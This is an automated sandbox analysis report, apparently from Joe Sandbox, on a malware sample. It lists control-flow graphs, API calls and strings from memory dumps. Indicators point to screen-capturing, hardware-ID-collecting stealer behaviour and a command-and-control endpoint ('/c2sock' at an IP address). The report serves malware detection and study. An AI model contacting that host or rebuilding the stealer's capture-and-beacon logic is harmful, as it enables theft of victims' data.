call 41941d call 419473 5835->5867 5850 41a936-41a94c 5836->5850 5851 41a5d6-41a5db 5836->5851 5870 41a797-41a7bf 5837->5870 5871 41a3e6-41a3eb 5837->5871 5864 41a992-41a999 5838->5864 5865 41a6ac-41a6b1 5838->5865 5858 41a80e-41a828 call 41c270 call 41f9a4 5839->5858 5859 41a4ce-41a4d3 5839->5859 5860 41a758-41a771 5840->5860 5861 41a36d-41a372 5840->5861 5846 41a5b0-41a5b5 5841->5846 5847 41a902-41a909 5841->5847 5844 41a7db-41a7e2 5842->5844 5845 41a42f-41a434 5842->5845 5854 41a951-41a970 5843->5854 5855 41a5f8-41a5fd 5843->5855 5844->5813 5877 41a9d7-41a9da 5845->5877 5878 41a43a-41a43f 5845->5878 5893 41a5bb-41a5c0 5846->5893 5894 41a90e-41a931 call 447e2f 5846->5894 5847->5813 5848->5813 5879 41a7f3-41a809 5849->5879 5880 41a479-41a47e 5849->5880 5850->5813 5896 41a5e1-41a5e8 5851->5896 5897 41aa30-41aa35 5851->5897 5898 41a73a-41a748 5852->5898 5899 41a30d-41a312 5852->5899 5853->5813 5882 41a977-41a97a 5854->5882 5895 41a972 5854->5895 5855->5813 5900 41a603-41a625 5855->5900 5856->5813 5904 41a64b call 41d057 5856->5904 5857->5813 5946 41a82d-41a834 5858->5946 5884 41a839-41a85a 5859->5884 5885 41a4d9-41a4de 5859->5885 5860->5813 5905 41a776-41a787 5861->5905 5906 41a378-41a37d 5861->5906 5886 41a518-41a51d 5862->5886 5887 41a86b-41a876 5862->5887 5863->5813 5864->5813 5865->5813 5907 41a6b7-41a6c4 5865->5907 5889 41a8b6-41a8e6 5866->5889 5890 41a55b-41a560 5866->5890 5948 41a8a1-41a8b1 5867->5948 5868->5813 5908 41a6df-41a700 call 41b251 5868->5908 5927 41a9ae-41a9bb 5869->5927 5881 41a7c5-41a7ca 5870->5881 5870->5882 5909 41a3f1-41a3f6 5871->5909 5910 41a7cf-41a7d6 5871->5910 5891 41a8f6-41a8fd 5872->5891 5892 41a58e-41a593 5872->5892 5873->5813 5902 41a9cd-41a9d5 5874->5902 5903 41a9ec-41aa15 5874->5903 5875->5813 5876 41a71b-41a722 5875->5876 5876->5813 5928 41a9db 5877->5928 5878->5813 5911 41a445-41a453 5878->5911 5879->5813 5880->5813 5914 41a484-41a4a8 call 41604a 5880->5914 5881->5882 5882->5813 5884->5813 5885->5813 5916 41a4e4-41a4f2 5885->5916 5886->5813 5917 41a523-41a526 call 447a80 5886->5917 5887->5882 5918 41a87c-41a881 5887->5918 5889->5882 5921 41a8ec-41a8f1 5889->5921 5890->5813 5920 41a566-41a573 5890->5920 5891->5813 5892->5813 5922 41a599-41a5a0 5892->5922 5893->5903 5924 41a5c6 5893->5924 5894->5813 5895->5882 5896->5813 5897->5813 5933 41aa3b-41aa48 5897->5933 5898->5882 5912 41a74e-41a753 5898->5912 5899->5813 5925 41a314-41a331 5899->5925 5900->5882 5926 41a62b-41a630 5900->5926 5902->5873 5902->5877 5930 41aa17 5903->5930 5931 41aa1c-41aa1f 5903->5931 5942 41a650-41a69c call 41aa49 * 3 5904->5942 5905->5882 5913 41a78d-41a792 5905->5913 5906->5813 5932 41a383-41a3b5 call 41592c call 41900a 5906->5932 5907->5813 5908->5813 5909->5813 5935 41a3fc-41a409 5909->5935 5910->5813 5911->5813 5912->5882 5913->5882 5914->5882 5951 41a4ae-41a4b3 5914->5951 5916->5813 5947 41a52b-41a535 5917->5947 5918->5882 5920->5813 5921->5882 5922->5813 5924->5813 5925->5882 5941 41a337-41a33c 5925->5941 5926->5882 5927->5813 5928->5928 5930->5931 5931->5813 5932->5882 5957 41a3bb-41a3c0 5932->5957 5935->5813 5941->5882 5942->5813 5946->5813 5947->5813 5948->5813 5951->5882 5957->5882
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _wctomb_s
                                                            • String ID: /c2sock$94.158.244.69$GhYuIq$file$hwid$lid$pid
                                                            • API String ID: 2865277502-1332857675
                                                            • Opcode ID: eb0b6a858b081c0f0339ece4a3e91829cc041cf882a78251da46bd4ef4ec5e2d
                                                            • Instruction ID: cc35308ceb474d8d45e9bf1619109491d7752d3a10985d79ac983763bc7ee506
                                                            • Opcode Fuzzy Hash: eb0b6a858b081c0f0339ece4a3e91829cc041cf882a78251da46bd4ef4ec5e2d
                                                            • Instruction Fuzzy Hash: 11F108B5D0211A9BDF248B88C8455FEBAB1AB14340F24496BE415F7394D33DCAE18B9F

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 6109 420003c-4200047 6110 4200049 6109->6110 6111 420004c-4200263 call 4200a3f call 4200e0f call 4200d90 VirtualAlloc 6109->6111 6110->6111 6126 4200265-4200289 call 4200a69 6111->6126 6127 420028b-4200292 6111->6127 6131 42002ce-42003c2 VirtualProtect call 4200cce call 4200ce7 6126->6131 6128 42002a1-42002b0 6127->6128 6130 42002b2-42002cc 6128->6130 6128->6131 6130->6128 6138 42003d1-42003e0 6131->6138 6139 42003e2-4200437 call 4200ce7 6138->6139 6140 4200439-42004b8 VirtualFree 6138->6140 6139->6138 6142 42005f4-42005fe 6140->6142 6143 42004be-42004cd 6140->6143 6144 4200604-420060d 6142->6144 6145 420077f-4200789 6142->6145 6147 42004d3-42004dd 6143->6147 6144->6145 6149 4200613-4200637 6144->6149 6151 42007a6-42007b0 6145->6151 6152 420078b-42007a3 6145->6152 6147->6142 6148 42004e3-4200505 LoadLibraryA 6147->6148 6153 4200517-4200520 6148->6153 6154 4200507-4200515 6148->6154 6157 420063e-4200648 6149->6157 6155 42007b6-42007cb 6151->6155 6156 420086e-42008be LoadLibraryA 6151->6156 6152->6151 6158 4200526-4200547 6153->6158 6154->6158 6159 42007d2-42007d5 6155->6159 6165 42008c7-42008f9 6156->6165 6157->6145 6160 420064e-420065a 6157->6160 6163 420054d-4200550 6158->6163 6161 4200824-4200833 6159->6161 6162 42007d7-42007e0 6159->6162 6160->6145 6164 4200660-420066a 6160->6164 6173 4200839-420083c 6161->6173 6168 42007e2 6162->6168 6169 42007e4-4200822 6162->6169 6170 42005e0-42005ef 6163->6170 6171 4200556-420056b 6163->6171 6172 420067a-4200689 6164->6172 6166 4200902-420091d 6165->6166 6167 42008fb-4200901 6165->6167 6167->6166 6168->6161 6169->6159 6170->6147 6174 420056d 6171->6174 6175 420056f-420057a 6171->6175 6176 4200750-420077a 6172->6176 6177 420068f-42006b2 6172->6177 6173->6156 6178 420083e-4200847 6173->6178 6174->6170 6180 420059b-42005bb 6175->6180 6181 420057c-4200599 6175->6181 6176->6157 6182 42006b4-42006ed 6177->6182 6183 42006ef-42006fc 6177->6183 6184 4200849 6178->6184 6185 420084b-420086c 6178->6185 6192 42005bd-42005db 6180->6192 6181->6192 6182->6183 6186 420074b 6183->6186 6187 42006fe-4200748 6183->6187 6184->6156 6185->6173 6186->6172 6187->6186 6192->6163
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0420024D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID: cess$kernel32.dll
                                                            • API String ID: 4275171209-1230238691
                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction ID: d8f387950e94e0f911890dd075781802a2d2187e6bf4e70d8d513a47c1733b33
                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                            • Instruction Fuzzy Hash: B2526B74A11229DFDB64CF58D984BACBBB1BF09304F1480D9E54DAB392DB30AA85DF14

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 6334 432718-43272b 6335 43272e-432736 6334->6335 6336 432771-432776 6335->6336 6337 432738-43273d 6335->6337 6338 432821-432826 6336->6338 6339 43277c-432781 6336->6339 6340 432743-432748 6337->6340 6341 4327f0-4327f5 6337->6341 6342 432910-432915 6338->6342 6343 43282c-432831 6338->6343 6344 432787-43278c 6339->6344 6345 4328a9-4328ae 6339->6345 6346 432872-432877 6340->6346 6347 43274e-432753 6340->6347 6348 4327fb-432800 6341->6348 6349 4328e9-4328ee 6341->6349 6356 432ae4-432aeb 6342->6356 6357 43291b-432920 6342->6357 6350 432837-43283c 6343->6350 6351 432a26-432a52 BitBlt 6343->6351 6352 432792-432797 6344->6352 6353 4329d8-4329eb 6344->6353 6364 4328b0-4328b5 6345->6364 6365 4328d6-4328e4 6345->6365 6358 432a76-432a8d CreateCompatibleBitmap 6346->6358 6359 43287d-432882 6346->6359 6360 432979-43298f 6347->6360 6361 432759-43275e 6347->6361 6362 432806-43280b 6348->6362 6363 4329fc-432a09 6348->6363 6354 4328f4-4328f9 6349->6354 6355 432ace-432adf 6349->6355 6366 432842-432847 6350->6366 6367 432a5b-432a71 SelectObject 6350->6367 6368 432ac6-432ac9 6351->6368 6369 432a54-432a59 6351->6369 6376 4329f0-4329f7 6352->6376 6377 43279d-4327a2 6352->6377 6353->6335 6354->6335 6378 4328ff-43290b 6354->6378 6355->6335 6356->6335 6357->6335 6379 432926-432934 6357->6379 6358->6335 6370 432a92-432abf call 4338b5 call 43350d 6359->6370 6371 432888-43288d 6359->6371 6360->6335 6372 432994-4329d3 call 430e6c * 2 6361->6372 6373 432764-432769 6361->6373 6380 432811-432816 6362->6380 6381 432a0e-432a21 SelectObject 6362->6381 6363->6335 6374 432af0-432af5 6364->6374 6375 4328bb-4328c6 6364->6375 6365->6335 6366->6335 6382 43284d-432863 call 432b1b 6366->6382 6367->6335 6368->6335 6369->6368 6370->6368 6409 432ac1 6370->6409 6371->6335 6384 432893-4328a4 CreateCompatibleDC 6371->6384 6372->6335 6385 432943-432946 6373->6385 6386 43276f 6373->6386 6374->6335 6388 432afb-432b1a DeleteDC DeleteObject 6374->6388 6375->6385 6387 4328c8-4328d0 6375->6387 6376->6335 6377->6335 6389 4327a4-4327e0 call 4338b5 call 432718 6377->6389 6378->6335 6390 432936 6379->6390 6391 43293b-43293e 6379->6391 6393 43295b-432974 6380->6393 6394 43281c 6380->6394 6381->6335 6405 432865 6382->6405 6406 43286a-43286d 6382->6406 6384->6335 6399 432947 6385->6399 6386->6335 6387->6365 6387->6393 6389->6368 6411 4327e6-4327eb 6389->6411 6390->6391 6391->6368 6393->6335 6394->6335 6399->6399 6405->6406 6406->6368 6409->6368 6411->6368
                                                            APIs
                                                            • CreateCompatibleDC.GDI32(00000D62), ref: 00432894
                                                            • DeleteDC.GDI32(00000002), ref: 00432B01
                                                            • DeleteObject.GDI32(?), ref: 00432B0A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Delete$CompatibleCreateObject
                                                            • String ID:
                                                            • API String ID: 1022343127-0
                                                            • Opcode ID: 9c86189b810d3e515d08f5d9a84ca5729e654e6d330d14ecc6a0223a2e2684ea
                                                            • Instruction ID: 50fedbdf880eafc0b33480be7e0390951b775b57d16ab65b209ae7f2f2027e24
                                                            • Opcode Fuzzy Hash: 9c86189b810d3e515d08f5d9a84ca5729e654e6d330d14ecc6a0223a2e2684ea
                                                            • Instruction Fuzzy Hash: 358116B590031A9BDF209F948EC557E7A74BB0C350F282617E510F63A0D3FD9A419BAB

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 6412 44cf15-44cf21 6413 44cfb3-44cfb6 6412->6413 6414 44cf26-44cf37 6413->6414 6415 44cfbc 6413->6415 6417 44cf44-44cf5d LoadLibraryExW 6414->6417 6418 44cf39-44cf3c 6414->6418 6416 44cfbe-44cfc2 6415->6416 6421 44cfc3-44cfd3 6417->6421 6422 44cf5f-44cf68 GetLastError 6417->6422 6419 44cf42 6418->6419 6420 44cfdc-44cfde 6418->6420 6424 44cfb0 6419->6424 6420->6416 6421->6420 6423 44cfd5-44cfd6 FreeLibrary 6421->6423 6425 44cfa1-44cfae 6422->6425 6426 44cf6a-44cf7c call 4516ce 6422->6426 6423->6420 6424->6413 6425->6424 6426->6425 6429 44cf7e-44cf90 call 4516ce 6426->6429 6429->6425 6432 44cf92-44cf9f LoadLibraryExW 6429->6432 6432->6421 6432->6425
                                                            APIs
                                                            • FreeLibrary.KERNEL32(00000000,?,0044D022,?,00426F52,00000000,00000000,?,?,0044CDD6,00000021,FlsSetValue,0046503C,FlsSetValue,00000000), ref: 0044CFD6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID: api-ms-$ext-ms-
                                                            • API String ID: 3664257935-537541572
                                                            • Opcode ID: 6740c229368fb351fb4ec7fc524e13049988398a7c5dabcb7bff3fed9ad9b5d0
                                                            • Instruction ID: c6a9518bbc4403065455c8dc6532f837efe444071a0c6fa5154c8577c36c6d79
                                                            • Opcode Fuzzy Hash: 6740c229368fb351fb4ec7fc524e13049988398a7c5dabcb7bff3fed9ad9b5d0
                                                            • Instruction Fuzzy Hash: 4521EE31E47210ABEB219B65DCC0A5B77699B41764B190122FD05A73D0FBBCDD08C6DD

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 6676 44575f-445778 6678 44578d-44579d 6676->6678 6679 44577a-44578b call 4447a4 call 44e2f7 6676->6679 6680 4457b2-4457b8 6678->6680 6681 44579f-4457b0 call 4447a4 call 44e2f7 6678->6681 6699 4457e0-4457e2 6679->6699 6684 4457c0-4457c6 6680->6684 6685 4457ba 6680->6685 6704 4457df 6681->6704 6691 4457e3 call 453aae 6684->6691 6692 4457c8 6684->6692 6689 4457d2-4457dc call 4447a4 6685->6689 6690 4457bc-4457be 6685->6690 6702 4457de 6689->6702 6690->6684 6690->6689 6700 4457e8-4457fd call 453711 6691->6700 6692->6689 6696 4457ca-4457d0 6692->6696 6696->6689 6696->6691 6706 445803-44580f call 45373d 6700->6706 6707 4459ee-4459f8 call 44e307 6700->6707 6702->6704 6704->6699 6706->6707 6712 445815-445821 call 453769 6706->6712 6712->6707 6715 445827-44583c 6712->6715 6716 4458ac-4458b7 call 4537d0 6715->6716 6717 44583e 6715->6717 6716->6702 6723 4458bd-4458c8 6716->6723 6718 445840-445846 6717->6718 6719 445848-445864 call 4537d0 6717->6719 6718->6716 6718->6719 6719->6702 6727 44586a-44586d 6719->6727 6725 4458e4 6723->6725 6726 4458ca-4458d3 call 453a5a 6723->6726 6729 4458e7-4458fb call 4543d0 6725->6729 6726->6725 6735 4458d5-4458e2 6726->6735 6730 4459e7-4459e9 6727->6730 6731 445873-44587c call 453a5a 6727->6731 6738 4458fd-445905 6729->6738 6739 445908-44592f call 4527e0 call 4543d0 6729->6739 6730->6702 6731->6730 6740 445882-44589a call 4537d0 6731->6740 6735->6729 6738->6739 6748 445931-44593a 6739->6748 6749 44593d-445964 call 4527e0 call 4543d0 6739->6749 6740->6702 6745 4458a0-4458a7 6740->6745 6745->6730 6748->6749 6754 445966-44596f 6749->6754 6755 445972-445981 call 4527e0 6749->6755 6754->6755 6758 445983 6755->6758 6759 4459a9-4459c7 6755->6759 6762 445985-445987 6758->6762 6763 445989-44599d 6758->6763 6760 4459e4 6759->6760 6761 4459c9-4459e2 6759->6761 6760->6730 6761->6730 6762->6763 6764 44599f-4459a1 6762->6764 6763->6730 6764->6730 6765 4459a3 6764->6765 6765->6759 6766 4459a5-4459a7 6765->6766 6766->6730 6766->6759
                                                            APIs
                                                            • __allrem.LIBCMT ref: 004458F2
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0044590E
                                                            • __allrem.LIBCMT ref: 00445925
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00445943
                                                            • __allrem.LIBCMT ref: 0044595A
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00445978
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                            • String ID:
                                                            • API String ID: 1992179935-0
                                                            • Opcode ID: 6914c5dd9646aa3fd790727cf4e39c2290796d50bc97961f3513338c227282f2
                                                            • Instruction ID: 558deed22b9213933cb6ee14014e535275a7d7dbd354c33e6b5693a62e892da8
                                                            • Opcode Fuzzy Hash: 6914c5dd9646aa3fd790727cf4e39c2290796d50bc97961f3513338c227282f2
                                                            • Instruction Fuzzy Hash: 0681D8B1600B06DBFB20AE29CC42B5BB3E9AF54768F24452FE411D67C3E778D9058B58
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 9a%^$M%$Screen.png
                                                            • API String ID: 0-2021954137
                                                            • Opcode ID: 7ea333df6f5c2910ca2bc4c4f4777871bdb5a703dffbbcdfcf0a34b6d9d0a0f5
                                                            • Instruction ID: 11fefa64aaa65e2afc3480572e0d96af9cd0f56f536a59b59af3bc8bd9e58722
                                                            • Opcode Fuzzy Hash: 7ea333df6f5c2910ca2bc4c4f4777871bdb5a703dffbbcdfcf0a34b6d9d0a0f5
                                                            • Instruction Fuzzy Hash: 4691D8B6E005098ADF248E98888557EB6B4AB9C312F647917E416FB390E37CCF41875B
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00402FE0
                                                            • LoadLibraryA.KERNELBASE(my-global-render.dll), ref: 00402FEA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID: advapi32.dll$my-global-render.dll
                                                            • API String ID: 1029625771-772900288
                                                            • Opcode ID: 925eec738fb8ed2f48ee2fb466019044b8b010c49f75685c643bb3b93b1091e7
                                                            • Instruction ID: f2405b5e0aceb9a51e137d87bf907524102569514c3531be8be57496d61f3bc2
                                                            • Opcode Fuzzy Hash: 925eec738fb8ed2f48ee2fb466019044b8b010c49f75685c643bb3b93b1091e7
                                                            • Instruction Fuzzy Hash: 6BA1F872D0412A86CF64CE98994527E6E78BB10351F250A3BE915FA3D0C7BCCF41A79B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ^^4$^^4$~rjz
                                                            • API String ID: 0-2511145224
                                                            • Opcode ID: e0c7894fc243b6b43147b7a10468ae5ae2dedb06c2c8e31032a7761496933ed1
                                                            • Instruction ID: fe384b451c266d20576388885646b2b98754c57df49fd09348afa64f247ec54d
                                                            • Opcode Fuzzy Hash: e0c7894fc243b6b43147b7a10468ae5ae2dedb06c2c8e31032a7761496933ed1
                                                            • Instruction Fuzzy Hash: 9E618C72E0011947EF287D4888855BEB7919B88B1AF342927F115FB391C76C8F4D974B
                                                            APIs
                                                            • GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,00454058,004170BE,?), ref: 00453C36
                                                              • Part of subcall function 00453203: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0045769E,?,00000000,-00000008), ref: 004532AF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ByteCharInformationMultiTimeWideZone
                                                            • String ID: Eastern Standard Time$Eastern Summer Time
                                                            • API String ID: 1123094072-239921721
                                                            • Opcode ID: caf58cafb60ec3060b2a5cf257d1c9c7a73c601415e76bdfbbd359845a8db1e6
                                                            • Instruction ID: af1a61733d26d89116c9bb65ccd9636383a7b5e966e3c510a6c9de8ec0de26fa
                                                            • Opcode Fuzzy Hash: caf58cafb60ec3060b2a5cf257d1c9c7a73c601415e76bdfbbd359845a8db1e6
                                                            • Instruction Fuzzy Hash: FC4199B2D00115BBDB106FA6DC46A5ABF78EF04396F10406BFD04A7162E7789F148B99
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(0044387B,?,00443A9B,00000000,?,?,0044387B,A925AEC7,?,0044387B), ref: 004439CB
                                                            • TerminateProcess.KERNEL32(00000000,?,00443A9B,00000000,?,?,0044387B,A925AEC7,?,0044387B), ref: 004439D2
                                                            • ExitProcess.KERNEL32 ref: 004439E4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 781b962f5f028f3a025d91418773fc66c46a7b9eca303b4a2ef1248f55b92173
                                                            • Instruction ID: af00403c123718aebf8df8255158ed5eb80799a0d3dec5c869f97e29736db2e2
                                                            • Opcode Fuzzy Hash: 781b962f5f028f3a025d91418773fc66c46a7b9eca303b4a2ef1248f55b92173
                                                            • Instruction Fuzzy Hash: 7ED09E71404115BBEF113F61DC0E9593F2AAF40787B144029F90596132DFF59E51DB99
                                                            APIs
                                                            • GetCurrentHwProfileA.ADVAPI32(00000000,?,?,0041A650), ref: 0041D07D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CurrentProfile
                                                            • String ID: advapi32.dll
                                                            • API String ID: 2104809126-4050573280
                                                            • Opcode ID: 47e41008aad65778580e0c35056873463c47f4eed791b1223cc5fbeb135fea17
                                                            • Instruction ID: 6db1735cda00ed3d220bfaf1cacc4b3e5e01bff1461a9ef13bbd23f8b442f0e3
                                                            • Opcode Fuzzy Hash: 47e41008aad65778580e0c35056873463c47f4eed791b1223cc5fbeb135fea17
                                                            • Instruction Fuzzy Hash: 9BF0E9F3D4013126F61025AA5C01ABB7E888B46729F140177FD0CE6281E21E9D8242EA
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,00000000,?,00447A98,00426F52,?,?), ref: 0044E23A
                                                            • GetLastError.KERNEL32(?,?,00447A98,00426F52,?,?), ref: 0044E245
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 485612231-0
                                                            • Opcode ID: 5ab3d534c7926ab7bd1f653ef6df7c72235af480dfd0cba9c2c881dd6ec4968b
                                                            • Instruction ID: f015b3b87cbc766378ce5f0d68a15eb43446f93644205f51174f0ce78f182e30
                                                            • Opcode Fuzzy Hash: 5ab3d534c7926ab7bd1f653ef6df7c72235af480dfd0cba9c2c881dd6ec4968b
                                                            • Instruction Fuzzy Hash: 3AE08631100214ABEF112BA2AD0AB5A3B9CBF80355F104065F60896161EBB88850C7DD
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00000400,?,?,04200223,?,?), ref: 04200E19
                                                            • SetErrorMode.KERNELBASE(00000000,?,?,04200223,?,?), ref: 04200E1E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4200000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                            • Instruction ID: 7f18243f094355aed393038a9e4f666a0cd0c293d4ed3e5987dac0fabc226c75
                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                            • Instruction Fuzzy Hash: 4DD0123124512877D7002A94DC09BCD7B5CDF09B62F008011FB0DE9081C770954046E5
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID:
                                                            • API String ID: 4218353326-0
                                                            • Opcode ID: 4e1718403e1c9f4dc854db183ebccdab995ea214547ce8d1c5d4ce7d2dfc11b0
                                                            • Instruction ID: 1d70213f864448114667fa93143398f689e43ce09380febb34e55b8e9c3c6d32
                                                            • Opcode Fuzzy Hash: 4e1718403e1c9f4dc854db183ebccdab995ea214547ce8d1c5d4ce7d2dfc11b0
                                                            • Instruction Fuzzy Hash: AEC1ECB1A05B009FD724CF29C88166BFBE5FF88314F14892EE5AA83750E774E845CB56
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0a8d065c2e7d1e5bd55c3a73d0c85b8c9c2db864d3e8117d795f012447403357
                                                            • Instruction ID: 373710123005f16d466fbf61102d91235a16be84b9ed3eb2ab6254e0a7e141d7
                                                            • Opcode Fuzzy Hash: 0a8d065c2e7d1e5bd55c3a73d0c85b8c9c2db864d3e8117d795f012447403357
                                                            • Instruction Fuzzy Hash: B6016D33B001145FBF11CE69EC4595B3796EBC1328B244132F904CB185FB39CC028389
                                                            APIs
                                                              • Part of subcall function 0044EB6F: RtlAllocateHeap.NTDLL(00000000,00426DF1,?,?,00426DF1,?), ref: 0044EBA1
                                                            • RtlReAllocateHeap.NTDLL(00000000,00000000,00413871,00000000,00000000,00000000,00413871,00000000,00000000,7750F770,?,0041A136,00001FE6,00003CA7,?,000016E5), ref: 004569FC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_I5jG2Os8GA.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: a0eecb7647cd985660cbc4ebe15971cfc3f9a0df64ec6594d00528a4e276af4a
                                                            • Instruction ID: a5a40cd43560794f83e54c6bbfcb227c9197063c5c667a14a31a2b77de81b9f8
                                                            • Opcode Fuzzy Hash: a0eecb7647cd985660cbc4ebe15971cfc3f9a0df64ec6594d00528a4e276af4a
                                                            • Instruction Fuzzy Hash: 80F0C8B110011576AB212A279C01B6B276C9FC1B76F56013FFC1497293EE7C9809C29E
                                                            APIs
